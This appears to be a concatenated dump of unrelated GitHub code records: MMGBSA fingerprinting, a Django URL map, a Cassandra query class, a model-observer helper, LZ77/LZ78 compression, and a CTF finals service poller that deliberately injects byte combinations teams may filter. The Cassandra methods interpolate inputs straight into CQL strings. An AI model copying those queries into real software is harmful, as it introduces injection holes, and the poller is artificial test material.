list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n residue_set.add(residue)\r\n residue_list = list(residue_set) # all the residues that have interactions in all pocket files\r\n MMGBSA_fp_list = [] # initialize it as a list to append the fingerprints and the convert it to array\r\n for compound in compound_list:\r\n # print(compound)\r\n # print(self.compound_residue_LIG_decompositionArray_mdict[compound].keys())\r\n if not residue_list[0] in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n if (stdev == True and stderr == False) or (stdev == False and stderr == True):\r\n MMGBSA_fp = np.zeros(2)\r\n elif stdev == True and stderr == True:\r\n MMGBSA_fp = np.zeros(3)\r\n elif stdev == False and stderr == False:\r\n MMGBSA_fp = np.zeros(1)\r\n else:\r\n if stdev == True and stderr == False:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][5,0:2].ravel()\r\n elif stdev == False and stderr == True:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][5,0::2].ravel()\r\n elif stdev == True and stderr == True:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][5,:].ravel()\r\n elif stdev == False and stderr == False:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][5,0].ravel()\r\n for residue in residue_list[1:]:\r\n if not residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n if (stdev == True and stderr == False) or (stdev == False and stderr == True):\r\n a1 = np.zeros(2)\r\n elif stdev == True and stderr == True:\r\n a1 = np.zeros(3)\r\n elif stdev == False and stderr == False:\r\n a1 = np.zeros(1)\r\n else:\r\n if stdev == True and stderr == False:\r\n a1 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][5,0:2].ravel() # 1st & 2nd element\r\n elif stdev == False and stderr == True:\r\n a1 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][5,0::2].ravel() # 1st & 3rd element\r\n elif stdev == True and stderr == True:\r\n a1 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][5,:].ravel() # all 3 elements\r\n elif stdev == False and stderr == False:\r\n a1 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][5,0].ravel() # 1st element\r\n MMGBSA_fp = np.append(MMGBSA_fp , a1.ravel())\r\n # MMGBSA_fp[0::2] = -1.0*MMGBSA_fp[0::2] # change the singe of the DeltaG (NOTHING CHANGES IN THE PRERFORMANCE!)\r\n # print(\"DEBUG: append MMGBSA_fp=\", MMGBSA_fp.tolist())\r\n MMGBSA_fp_list.append(MMGBSA_fp)\r\n \r\n if binnedDeltaG:\r\n MMGBSA_fp_list = self.get_binnedDeltaG(MMGBSA_fp_list) # MMGBSA_fp_list now contrains only binned DeltaG, no stdev\r\n \r\n residue_list = [r.split()[0]+r.split()[1] for r in residue_list] # make the format compatible with SiFt\r\n \r\n if scale == True:\r\n MMGBSA_fp_array = np.array(MMGBSA_fp_list, dtype=float)\r\n if (stdev == True and stderr == False) or (stdev == False and stderr == True):\r\n Xmax1 = np.max(MMGBSA_fp_array[:, 0::2])\r\n Xmin1 = np.min(MMGBSA_fp_array[:, 0::2])\r\n Xmax2 = np.max(MMGBSA_fp_array[:, 1::2])\r\n Xmin2 = np.min(MMGBSA_fp_array[:, 1::2])\r\n MMGBSA_fp_array[:, 0::2] = (MMGBSA_fp_array[:, 0::2] - Xmin1) / float(Xmax1 - Xmin1)\r\n MMGBSA_fp_array[:, 1::2] = (MMGBSA_fp_array[:, 1::2] - Xmin2) / float(Xmax2 - Xmin2)\r\n elif stdev == True and stderr == True:\r\n Xmax1 = np.max(MMGBSA_fp_array[:, 0::3])\r\n Xmin1 = np.min(MMGBSA_fp_array[:, 0::3])\r\n Xmax2 = np.max(MMGBSA_fp_array[:, 1::3])\r\n Xmin2 = np.min(MMGBSA_fp_array[:, 1::3])\r\n Xmax3 = np.max(MMGBSA_fp_array[:, 2::3])\r\n Xmin3 = np.min(MMGBSA_fp_array[:, 2::3])\r\n MMGBSA_fp_array[:, 0::3] = (MMGBSA_fp_array[:, 0::3] - Xmin1) / float(Xmax1 - Xmin1)\r\n MMGBSA_fp_array[:, 1::3] = (MMGBSA_fp_array[:, 1::3] - Xmin2) / float(Xmax2 - Xmin2)\r\n MMGBSA_fp_array[:, 2::3] = (MMGBSA_fp_array[:, 2::3] - Xmin3) / float(Xmax3 - Xmin3)\r\n elif stdev == False and stderr == False:\r\n Xmax = np.max(MMGBSA_fp_array)\r\n Xmin = np.min(MMGBSA_fp_array)\r\n MMGBSA_fp_array = (MMGBSA_fp_array - Xmin) / float(Xmax - Xmin)\r\n if get_reslist:\r\n return list(MMGBSA_fp_array), residue_list\r\n else:\r\n return list(MMGBSA_fp_array)\r\n \r\n if get_reslist:\r\n return MMGBSA_fp_list, residue_list\r\n else:\r\n return MMGBSA_fp_list\r\n # return np.array(MMGBSA_fp_list, dtype=float)\r\n \r\n \r\n def get_MMGBSA_fp_list3(self, compound_list, scale=True):\r\n \"\"\"\r\n FUNCTION to create and return an array with the MMGBSA fingerprints (E contribution and stderr) of all the compounds in compound_list.\r\n \"\"\"\r\n # compound_list = self.compound_residue_LIG_decompositionArray_mdict.keys()\r\n residue_list = list(self.compound_residue_LIG_decompositionArray_mdict[compound_list[0]].keys())\r\n MMGBSA_fp_list = [] # initialize it as a list to append the fingerprints and the convert it to array\r\n for compound in compound_list:\r\n # print(compound)\r\n # print(self.compound_residue_LIG_decompositionArray_mdict[compound].keys())\r\n if not residue_list[0] in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n MMGBSA_fp = np.zeros(12)\r\n else:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][:,0::2].ravel() # the full MMGBSA fingeprint(for this compound\r\n for residue in residue_list[1:]:\r\n if not residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n a6x2 = np.zeros(12)\r\n else:\r\n a6x2 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][:,0::2]\r\n MMGBSA_fp = np.append(MMGBSA_fp , a6x2.ravel())\r\n MMGBSA_fp_list.append(MMGBSA_fp)\r\n \r\n if scale == True:\r\n MMGBSA_fp_array = np.array(MMGBSA_fp_list, dtype=float)\r\n Xmax1 = np.max(MMGBSA_fp_array[:, 0::2])\r\n Xmin1 = np.min(MMGBSA_fp_array[:, 0::2])\r\n Xmax2 = np.max(MMGBSA_fp_array[:, 1::2])\r\n Xmin2 = np.min(MMGBSA_fp_array[:, 1::2])\r\n MMGBSA_fp_array[:, 0::2] = (MMGBSA_fp_array[:, 0::2] - Xmin1) / float(Xmax1 - Xmin1)\r\n MMGBSA_fp_array[:, 1::2] = (MMGBSA_fp_array[:, 1::2] - Xmin2) / float(Xmax2 - Xmin2)\r\n return list(MMGBSA_fp_array)\r\n \r\n return MMGBSA_fp_list\r\n # return np.array(MMGBSA_fp_list, dtype=float)\r\n \r\n def remove_compounds(self, compound_list, compounds2remove_set, dataset, y):\r\n \"\"\"\r\n FUNCTION to remove data of compounds that could not be Energy-decomposed completely.\r\n \"\"\"\r\n new_compound_list = []\r\n new_dataset = []\r\n new_y = []\r\n for c,xi,yi in zip(compound_list, dataset, y):\r\n if not c in compounds2remove_set:\r\n new_compound_list.append(c)\r\n new_dataset.append(xi)\r\n new_y.append(yi)\r\n \r\n return new_compound_list, new_dataset, new_y\r\n ","repo_name":"tevang/sqm-ml","sub_path":"library/MMGBSA_functions.py","file_name":"MMGBSA_functions.py","file_ext":"py","file_size_in_byte":51890,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"12743326824","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom pages import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n\tpath('', views.home, name='home'),\n path('dataset_presentation/', views.dataset_presentation, name='dataset_presentation'),\n path('dataset_presentation/introduction', views.introduction, name='introduction'),\n path('dataset_presentation/features', views.features, name='features'),\n path('dataset_presentation/label', views.label, name='label'),\n path('analysis/', views.analysis, name='analysis'),\n path('analysis/head', views.head, name='head'),\n path('analysis/describe', views.describe, name='describe'),\n path('analysis/data_s', views.data_s, name='data_s'),\n path('analysis/visualization', views.visualization, name='visualization'),\n path('analysis/visualization/pie_plots', views.pie_plots, name='pie_plots'),\n path('analysis/visualization/box_plots', views.box_plots, name='box_plots'),\n path('analysis/visualization/skewness', views.skewness, name='skewness'),\n path('analysis/visualization/scatter_plots', views.scatter_plots, name='scatter_plots'),\n path('analysis/visualization/heatmap', views.heatmap, name='heatmap'),\n path('ml', views.ml, name='ml'),\n path('ml/preprocessing', views.preprocessing, name='preprocessing'),\n path('ml/preprocessing/x_and_y', views.x_and_y, name='x_and_y'),\n path('ml/preprocessing/encoding_y', views.encoding_y, name='encoding_y'),\n path('ml/preprocessing/encoding_x', views.encoding_x, name='encoding_x'),\n path('ml/preprocessing/normalizing_x', views.normalizing_x, name='normalizing_x'),\n path('ml/preprocessing/spliting', views.spliting, name='spliting'),\n path('ml/machine_learning', views.machine_learning, name='machine_learning'),\n path('ml/machine_learning/linear_svc', views.linear_svc, name='linear_svc'),\n path('ml/machine_learning/kneighborsclassifier', views.kneighborsclassifier, name='kneighborsclassifier'),\n path('ml/machine_learning/svc', views.svc, name='svc')\n \n]\n","repo_name":"ArnaudMagarian/Python-for-data-analysis-ML","sub_path":"mysite/mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15866392618","text":"import itertools\nfrom cassandra.cluster import Cluster\nfrom cassandra.query import dict_factory\n\nclass DB():\n\n @classmethod\n def open_con(cls):\n cls.cluster = Cluster(['cassandra-c01', 'cassandra-c02'], port=9042)\n # cls.cluster = Cluster(['localhost'], port=9042)\n\n cls.session = cls.cluster.connect('resto')\n\n cls.session.row_factory = dict_factory\n\n @classmethod\n def close_con(cls):\n cls.cluster.shutdown()\n\n\n\n @classmethod\n def get_info_by_id(cls, id_resto):\n cls.open_con()\n data = cls.session.execute(f\"SELECT * FROM restaurant WHERE id={id_resto}\").one() \n cls.close_con()\n\n return {'info' : data}\n\n\n @classmethod\n def get_name_by_type(cls, type_cuisine):\n cls.open_con()\n data = cls.session.execute(f\"SELECT * FROM restaurant WHERE cuisinetype='{type_cuisine}'\").all()\n cls.close_con()\n\n return {'data': [resto['name'] for resto in data]}\n\n\n @classmethod\n def get_nb_inspec_by_id(cls, id_resto):\n cls.open_con()\n data = cls.session.execute(f\"select * from restaurant where id = {id_resto}\").one()\n number = len(cls.session.execute(f\"select * from inspection where idrestaurant = {id_resto}\").all())\n\n cls.close_con()\n return {'name': data['name'], 'nb_inspection': number }\n\n\n# les noms des 10 premiers restaurants d'un grade donné.\n @classmethod\n def get_top_10(cls, grade):\n cls.open_con()\n\n data = cls.session.execute(f\"select * from inspection where grade = '{grade}'\").all()\n _ids = tuple(resto['idrestaurant'] for resto in data)[:100]\n top_10 = cls.session.execute(f\"SELECT name FROM restaurant WHERE id IN {_ids}\").all()\n cls.close_con()\n\n return {'grade': grade, 'restaurant': [resto['name'] for resto in top_10][:10]}\n\n","repo_name":"wimblow01/Cassandra_docker_restaurant","sub_path":"app/connexion.py","file_name":"connexion.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38009458570","text":"from abc import abstractmethod\nfrom django.db.models import signals\nfrom django.utils.translation import gettext as _\n\n\nclass ModelObserver:\n \"\"\"\n This class will observe model behavior and triggers different signals.\n \"\"\"\n\n # Signal types\n _available_signal_types = ('pre_init', 'post_init', 'pre_save', 'post_save',\n 'pre_delete', 'post_delete', 'm2m_changed',\n 'pre_migrate', 'post_migrate')\n\n # Model default signals of type: method_name as key and signal_type as value\n DEFAULT_SIGNALS: dict = {\n 'pre_save': '_pre_saving',\n 'post_save': '_post_saving',\n 'post_delete': 'on_delete',\n }\n\n # Model custom signals of type: method_name as key and signal_type as value\n SIGNALS: dict = {}\n\n # Suffix for changed fields. Will be used for method call in _pre_saving\n # method.\n SUFFIX = '_changed'\n\n def __init__(self):\n self._signals()\n\n def _pre_saving(self, **kwargs):\n # Arguments\n instance = kwargs.get('instance')\n\n if not instance.pk:\n # In case when object is creating.\n return True\n\n # Getting object before changes\n model = instance.__class__\n\n try:\n previous = model.objects.get(pk=instance.pk)\n instance._pre_save_instance = previous\n instance._pre_delete_instance = previous\n except model.DoesNotExist:\n previous = instance\n instance._pre_save_instance = previous\n instance._pre_delete_instance = previous\n\n # Getting all model fields\n fields = instance._meta.concrete_fields\n\n for field in fields:\n name = field.name\n current_value = getattr(instance, name)\n previous_value = getattr(previous, name)\n method = getattr(self, f'{name}{self.SUFFIX}', None)\n\n if current_value != previous_value and method:\n method(**kwargs)\n\n def _post_saving(self, **kwargs):\n if kwargs.get('created', False):\n return self.on_create(**kwargs)\n\n return self.on_update(**kwargs)\n\n @abstractmethod\n def on_create(self, **kwargs):\n ...\n\n @abstractmethod\n def on_update(self, **kwargs):\n ...\n\n @abstractmethod\n def on_delete(self, **kwargs):\n ...\n\n def _get_all_signals(self):\n all_signals = self.DEFAULT_SIGNALS.copy()\n all_signals.update(self.SIGNALS)\n\n def _signals(self):\n all_signals = self.DEFAULT_SIGNALS.copy()\n all_signals.update(self.SIGNALS)\n\n for signal_type, method_name in all_signals.items():\n # Verifying that method was indicated in SIGNALS model param.\n receiver = getattr(self, method_name, None)\n if not receiver:\n raise AttributeError(_('\\'%(name)s\\' model has no method \\'%(method)s\\'' %\n ({'name': self.__class__.__name__, 'method': method_name})))\n\n # Initialize signal by calling a method.\n self._signal(signal_type, receiver)\n\n def _signal(self, signal_type, receiver):\n # Verifying for existence of signal type.\n signal = getattr(signals, signal_type, None)\n if not signal:\n raise AttributeError(_('Signals don\\'t have signal of type \\'%(first)s\\'. '\n 'Available signal types: %(second)s' %\n ({'first': signal_type, 'second': self._available_signal_types})))\n\n # Setting up dispatch_uid\n dispatch_uid = f'{self.__class__.__name__}_{signal_type}'\n\n # Initializing signal\n signal.connect(receiver=receiver, dispatch_uid=dispatch_uid,\n weak=False, sender=self.__class__)\n","repo_name":"ebs-integrator/model-observer","sub_path":"src/model_observer/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6073875415","text":"import sys, os\nimport socket\nimport select\nimport random\n\ndef eprint(*args, **kwargs):\n\tprint(*args, file=sys.stderr, **kwargs)\n\ndef GetData(s):\n\tdata = b\"\"\n\n\twhile(1):\n\t\tif len(data):\n\t\t\ttimeout = 0.5\n\t\telse:\n\t\t\ttimeout = 1.5\n\n\t\t(r,w,e) = select.select([s], [], [], timeout)\n\t\tif len(r) == 0:\n\t\t\treturn data\n\n\t\tnew_data = s.recv(1024)\n\t\tif len(new_data) == 0:\n\t\t\treturn data\n\n\t\tdata += new_data\n\treturn data\n\ndef GenRandomString(str_len):\n\tif str_len == -1:\n\t\tstr_len = random.randint(3, 100)\n\n\tstr = []\n\twhile(len(str) < str_len):\n\t\tstr.append(random.randint(1, 255))\n\t\tif str[-1] == 10:\n\t\t\tstr[-1] += 1\n\n\t#pick a random place to be a jerk and do 0408/0508/0608 knowing they might try to ban that combo but only randomly\n\tif random.choice([0,1,2]) == 0:\n\t\trandoffset = random.randint(0, len(str) - 4) & ~3\n\t\tstr[randoffset+2] = 4 + random.randint(0, 2)\n\t\tstr[randoffset+3] = 8\n\n\treturn bytes(str)\n\ndef GetDirections(s):\n\ts.send(b\"describe\\n\")\n\tdata = GetData(s)\n\n\t#parse up the directions\n\tDirections = {}\n\tdata = data.split(b\"\\n\")\n\tif b\"You are in\" not in data[0]:\n\t\treturn {}\n\n\tdata.pop(0)\n\tfor entry in data:\n\t\tcurline = entry.split()\n\t\tif len(curline) < 3:\n\t\t\tbreak\n\t\tcurdir = curline[2]\n\n\t\tdoortype = \"room\"\n\t\tif b\"empty slots\" in entry:\n\t\t\tdoortype = \"wheellock\"\n\t\telif b\"closed door\" in entry:\n\t\t\ts.send(b\"open \" + curdir + b\" door\\n\")\n\t\telif b\"locked closed door\" in entry:\n\t\t\tdoortype = \"lock\"\n\t\telif b\"powered door\" in entry:\n\t\t\tdoortype = \"power\"\n\t\telif b\"teleporter\" in entry:\n\t\t\tdoortype = \"teleporter\"\n\n\t\tif doortype not in Directions:\n\t\t\tDirections[doortype] = []\n\t\tDirections[doortype].append(curdir)\n\treturn Directions\n\ndef GetItems(s):\n\ts.send(b\"look\\n\")\n\tdata = GetData(s).split(b\"\\n\")\n\n\n\tItems = []\n\tfor entry in data:\n\t\tif b\"large switch\" in entry:\n\t\t\tItems.append(\"switch\")\n\t\t\tif b\"off position\" in entry:\n\t\t\t\ts.send(b\"flip switch\\n\")\n\t\telif b\"steam punk\" in entry:\n\t\t\tItems.append(\"display\")\n\t\t\t#print(\"Found display\")\n\t\t\tif b\"dark screen\" in entry:\n\t\t\t\ts.send(b\"activate display\\n\")\n\n\treturn Items\n\ndef GetDisplayDetails(s):\n\t#s.send(b\"view display\\n\")\n\tdata = GetData(s).split(b\"\\n\")\n\n\tRooms = []\n\tfor entry in data:\n\t\tcurline = entry.split()\n\t\tif len(curline) < 2:\n\t\t\tcontinue\n\t\tif curline[0] == b\"Room\":\n\t\t\tRooms.append(curline[1])\n\n\treturn Rooms\n\ndef MoveDirection(s, Directions, RoomLocations):\n\tif len(RoomLocations) and \"teleporter\" in Directions:\n\t\ts.send(b\"touch \" + Directions[\"teleporter\"][0] + b\" teleporter keypad\\n\")\n\t\ts.send(random.choice(RoomLocations) + b\"\\n\")\n\t\ts.send(b\"activate \" + Directions[\"teleporter\"][0] + b\" teleporter\\n\")\n\t\tdata = GetData(s)\n\t\tif b\"bright yellow fluxuating liquid\" not in data:\n\t\t\teprint(\"failed to activate teleporter\")\n\t\t\treturn -1\n\t\ts.send(Directions[\"teleporter\"][0] + b\"\\n\")\n\t\t#print(\"used teleporter\")\n\telse:\n\t\tret = random.choice(Directions[\"room\"]) + b\"\\n\"\n\t\ts.send(ret)\n\tGetData(s)\n\treturn 0\n\ndef RunPoller(remote_ip, remote_port):\n\ts = socket.create_connection((remote_ip, remote_port))\n\n\t#make sure we got a response\n\tdata = GetData(s)\n\tif b\"Please provide your name:\" not in data:\n\t\teprint(\"Failed to get name\")\n\t\treturn -1\n\n\ts.send(GenRandomString(-1) + b\"\\n\")\n\tGetData(s)\n\n\t#attempt to create a page then validate it\n\ts.send(b\"in journal create page\\n\")\n\tGetData(s)\n\n\ts.send(b\"in journal on page 1 write\\n\")\n\tGetData(s)\n\n\trand_str = GenRandomString(250)\n\ts.send(rand_str + b\"\\n\\n\")\n\t#get the output\n\tdata = GetData(s)\n\n\t#read the page\n\ts.send(b\"in journal read page 1\\n\")\n\tdata = GetData(s).split(b\"\\n\")\n\n\tif len(data) != 3:\n\t\teprint(\"Failed to read journal page data\")\n\t\treturn -1\n\n\tif rand_str != data[1]:\n\t\teprint(f\"Journal page data did not match: {len(rand_str)} != {len(data[1])}\")\n\t\treturn -1\n\n\t#crumple and uncrumple a page\n\ts.send(b\"from journal take page 1\\n\")\n\tdata = GetData(s).split(b\"\\n\")\n\ts.send(b\"crumple page 1\\n\")\n\ts.send(b\"uncrumple page 1\\n\")\n\tdata = GetData(s).split(b\"\\n\")\n\n\t#page writing seems ok and not muddled, go validate wandering a bit\n\tRoomLocations = []\n\tfor i in range(0, 100):\n\t\tDirections = GetDirections(s)\n\t\tItems = GetItems(s)\n\t\tif \"display\" in Items:\n\t\t\tRoomLocations = GetDisplayDetails(s)\n\n\t\tif MoveDirection(s, Directions, RoomLocations) == -1:\n\t\t\teprint(\"Failed to move direction\")\n\t\t\treturn -1\n\n\treturn 0\n\nif __name__ == \"__main__\":\n\tHOST = os.environ[\"HOST\"]\n\tPORT = os.environ[\"PORT\"]\n\tSEED = os.environ[\"SEED\"]\n\trandom.seed(SEED)\n\teprint(\"HOST={}\".format(HOST))\n\teprint(\"PORT={}\".format(PORT))\n\teprint(\"SEED={}\".format(SEED))\n\n\tret = -1\n\ttry:\n\t\tret = RunPoller(HOST, PORT)\n\texcept BrokenPipeError as ex:\n\t\tret = -1\n\texcept ConnectionError as ex:\n\t\tret = -1\n\texcept Exception as ex:\n\t\timport traceback\n\t\ttraceback.print_exc()\n\t\tret = 1\n\n\tif ret == -1:\n\t\tprint(\"bad\")\n\telif ret == 0:\n\t\tprint(\"good\")\n\telse:\n\t\tprint(\"poller exception\")\n\n\tsys.exit(ret)","repo_name":"Nautilus-Institute/finals-2022","sub_path":"Perplexity/poller.py","file_name":"poller.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"31"} +{"seq_id":"24662620158","text":"# Find Maximum Number of String Pairs\n# You are given a 0-indexed array words consisting of distinct strings.\n\n# The string words[i] can be paired with the string words[j] if:\n\n# The string words[i] is equal to the reversed string of words[j].\n# 0 <= i < j < words.length.\n# Return the maximum number of pairs that can be formed from the array words.\n\n# Note that each string can belong in at most one pair.\n\ndef maximumNumberOfStringPairs(words):\n count = 0\n for i in range(len(words)):\n for j in range(i+1, len(words)):\n if words[j][::-1] == words[i]:\n count += 1\n return count\nprint(maximumNumberOfStringPairs( words = [\"aa\",\"ab\"]))","repo_name":"vibhatsu08/leetcode-python","sub_path":"findMaximumNumberOfStringPairs.py","file_name":"findMaximumNumberOfStringPairs.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41320254086","text":"def half_pyramid(n):\r\n str=\"\"\r\n for i in range(0,n):\r\n if(i= 0')\n\n if self._running:\n self.stop()\n\n self._running = True\n self._interval = interval\n if now:\n self._self_thread = hub.spawn_after(0, self)\n else:\n self._self_thread = hub.spawn_after(self._interval, self)\n\n def stop(self):\n \"\"\"Stop running scheduled function.\n \"\"\"\n self._running = False\n if self._self_thread is not None:\n self._self_thread.cancel()\n self._self_thread = None\n\n def reset(self):\n \"\"\"Skip the next iteration and reset timer.\n \"\"\"\n if self._self_thread is not None:\n # Cancel currently scheduled call\n self._self_thread.cancel()\n self._self_thread = None\n # Schedule a new call\n self._self_thread = hub.spawn_after(self._interval, self)\n","repo_name":"cloudysunny14/ryu_ldp_service","sub_path":"ryu/ryu/services/protocols/ldp/ldp_util.py","file_name":"ldp_util.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29838943950","text":"import os\n\n\nclass LZ77:\n\n def __init__(self, searchBuffSize, lookAheadBuffSize):\n self.searchBuffSize = searchBuffSize\n self.lookAheadBuffSize = lookAheadBuffSize\n pass\n\n def encodeFiles(self, filename):\n if not os.path.exists(filename):\n print(\"file\", filename, \"not exist!\")\n with open(filename, 'r', encoding='utf-8') as f:\n return self.encode(f.read())\n\n def calculateCodingRate(self, stringLength, numTuples, encoding='unicode'):\n \"\"\"\n if we use unicode:\n for input string:\n the input bits is 16 * length_of_input_string\n for output string:\n since the search_buffer_size and look_buffer_size can't be greater than 256\n in usual cases. it require 8 bits to store 'o_i' and 'l_i' each\n for 'c_i', we assign 16 bits for unicode of c_i\n\n so it takes 8+8+16=32 bits for a tuple (o_i, l_i, c_i)\n\n so the coding rate = 2 * number_of_tuples / length_of_input_string\n :param stringLength:\n :param numTuples:\n :param codingMethod:\n :return: a float number representing coding rate\n \"\"\"\n\n if encoding == 'unicode':\n return 2 * numTuples / stringLength\n else:\n print(\"unknown coding method\")\n return 0\n\n\n def encode(self, input):\n \"\"\"\n :param input: should be a list containing characters\n :return: list of tuples\n i.e [(o_1, l_1, c_1), (o_2, l_2, c_2), ...., (o_n, l_n, c_n)]\n where 'o_i' is the offset, 'l_i' is the length of the match, and 'c_i' is the codeword corresponding to\n the symbol in the look-ahead buffer\n e.g:\n input = \"cabracadabrarrarrad\"\n codeword = [0, 0, 99, 0, 0, 97, 0, 0, 98, 0, 0, 114, 0, 0, 97, 0, 0, 99, 0, 0, 97, 0, 0, 100, 7, 4, 114, 3, 5, 100]\n \"\"\"\n codeword = []\n for i in range(min(self.searchBuffSize, len(input))):\n codeword.append((0, 0, ord(input[i])))\n if len(input) <= self.searchBuffSize:\n return codeword\n\n pt = self.searchBuffSize\n\n while pt < len(input):\n offset = self.searchBuffSize\n length = 0\n curOffset = self.searchBuffSize\n curLength = 0\n while curOffset > 0 and pt + curLength < len(input):\n search = input[pt - curOffset + curLength]\n lookAhead = input[pt + curLength]\n if search == lookAhead:\n curLength += 1\n else:\n if curLength > length:\n offset = curOffset\n length = curLength\n curOffset -= 1\n curLength = 0\n pt += length\n if pt == len(input):\n codeword.append((offset, length, 3)) # ASCII(^C) = 3, means end of file\n else:\n codeword.append((offset, length, ord(input[pt])))\n pt += 1\n\n codingRate = self.calculateCodingRate(len(input), len(codeword))\n\n return codeword, codingRate\n\n def decode(self, codeword):\n \"\"\"\n :param codeword: a 1-dimensional list of numbers, must be multiple of 3\n :return: a string containing the characters encoded\n\n e.g:\n codeword = [0, 0, 99, 0, 0, 97, 0, 0, 98, 0, 0, 114, 0, 0, 97, 0, 0, 99, 0, 0, 97, 0, 0, 100, 7, 4, 114, 3, 5, 100]\n output = \"cabracadabrarrarrad\"\n \"\"\"\n output = \"\"\n for tuple in codeword:\n o, l, c = tuple\n for j in range(l):\n output += output[-o]\n if c != 3:\n output += chr(c)\n return output\n\n\nclass LZ78:\n\n def __init__(self):\n pass\n\n def encodeFiles(self, filename):\n if not os.path.exists(filename):\n print(\"file\", filename, \"not exist!\")\n with open(filename, 'r', encoding='utf-8') as f:\n return self.encode(f.read())\n\n def calculateCodingRate(self, stringLength, numTuples, encoding='unicode'):\n \"\"\"\n if encoding is unicode:\n for input string:\n the input bits is 16 * length_of_input_string\n for output string:\n we assign 16 bits for o_i and 16 bits for c_i\n so it takes 16+16=32 bits for a tuple (o_i, c_i)\n\n so the coding rate = 2 * number_of_tuples / length_of_input_string\n\n :param stringLength:\n :param numTuples:\n :param encoding:\n :return:\n \"\"\"\n\n if encoding == 'unicode':\n return 2 * numTuples / stringLength\n else:\n print(\"unknown coding method\")\n return 0\n\n def encode(self, input):\n \"\"\"\n :param input: should be a list containing characters\n :return: a 1-dimensional list of numbers\n i.e [o_i, c_i]\n where 'o_i' is the offset, and 'c_i' is the last symbol of new entry\n e.g:\n input = \"cabracadabrarrarrad\"\n codeword = [0, 0, 99, 0, 0, 97, 0, 0, 98, 0, 0, 114, 0, 0, 97, 0, 0, 99, 0, 0, 97, 0, 0, 100, 7, 4, 114, 3, 5, 100]\n \"\"\"\n codeword = []\n entry = []\n i = 0\n while i < len(input):\n j = len(codeword) - 1\n while j >= 0:\n if i + len(entry[j]) < len(input) and entry[j] == input[i:i + len(entry[j])]:\n codeword.append([j + 1, ord(input[i + len(entry[j])])])\n entry.append(entry[j] + input[i + len(entry[j])])\n break\n j -= 1\n if j == -1:\n codeword.append([0, ord(input[i])])\n entry.append(input[i])\n i += 1\n else:\n i += len(entry[j]) + 1\n\n codingRate = self.calculateCodingRate(len(input), len(codeword))\n\n return codeword, codingRate\n\n def decode(self, codeword):\n output = \"\"\n entry = []\n for i in range(len(codeword)):\n j, c = codeword[i]\n c = chr(c)\n if j == 0:\n entry.append(c)\n output += c\n else:\n entry.append(entry[j - 1] + c)\n output += entry[j - 1] + c\n return output\n\n\nif __name__ == '__main__':\n\n# test1: test for basic function of LZ77\n print(\"==================test_case-1=====================\")\n\n input_string1 = \"cabracadabrarrarrad\"\n print(\"input string:\", input_string1)\n alg1 = LZ77(7, 6)\n print(\"test algorthm: LZ77(7, 6)\")\n codeword1, _ = alg1.encode(input_string1)\n print(\"codeword of input string: \", codeword1)\n decode_string1 = alg1.decode(codeword1)\n print(\"decode of codeword: \", decode_string1)\n\n# test2: test for basic function of LZ78\n print(\"==================test_case-2=====================\")\n\n input_string2 = \"wabba wabba wabba wabba woo woo woo\"\n print(\"input string:\", input_string2)\n alg2 = LZ78()\n print(\"test algorthm: LZ78\")\n codeword2, _ = alg2.encode(input_string2)\n print(\"codeword of input string: \", codeword2)\n decode_string2 = alg2.decode(codeword2)\n print(\"decode of codeword: \", decode_string2)\n\n# test3: test for coding rate of LZ77 and LZ78\n print(\"==================test_case-3=====================\")\n input_path = \"testfile.txt\"\n f = open(input_path, 'r', encoding='utf-8')\n input_string3 = f.read()\n print(\"total number of characters: \", len(input_string3))\n\n alg3 = LZ77(255, 8)\n\n _, rate2 = alg2.encode(input_string3)\n _, rate3 = alg3.encode(input_string3)\n\n print(\"-----coding-rate(unicode)--------\")\n print(\"|LZ77|%4f|\" % rate3)\n print(\"|LZ78|%4f|\" % rate2)\n\n print('==================finished=========================')\n\n","repo_name":"zixuan-chen/Lempel-Ziv","sub_path":"algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":7811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1954950191","text":"L = ['POON', 'PLEE', 'SAME', 'POIE', 'PLEA', 'PLIE', 'POIN']\nStart = 'TOON'\nEnd = 'PLEA'\ncount = 0\n\nfor l in L:\n if Start == End:\n print(\"Successful in {} attempts\".format(count))\n exit(0)\n else:\n Start = l\n 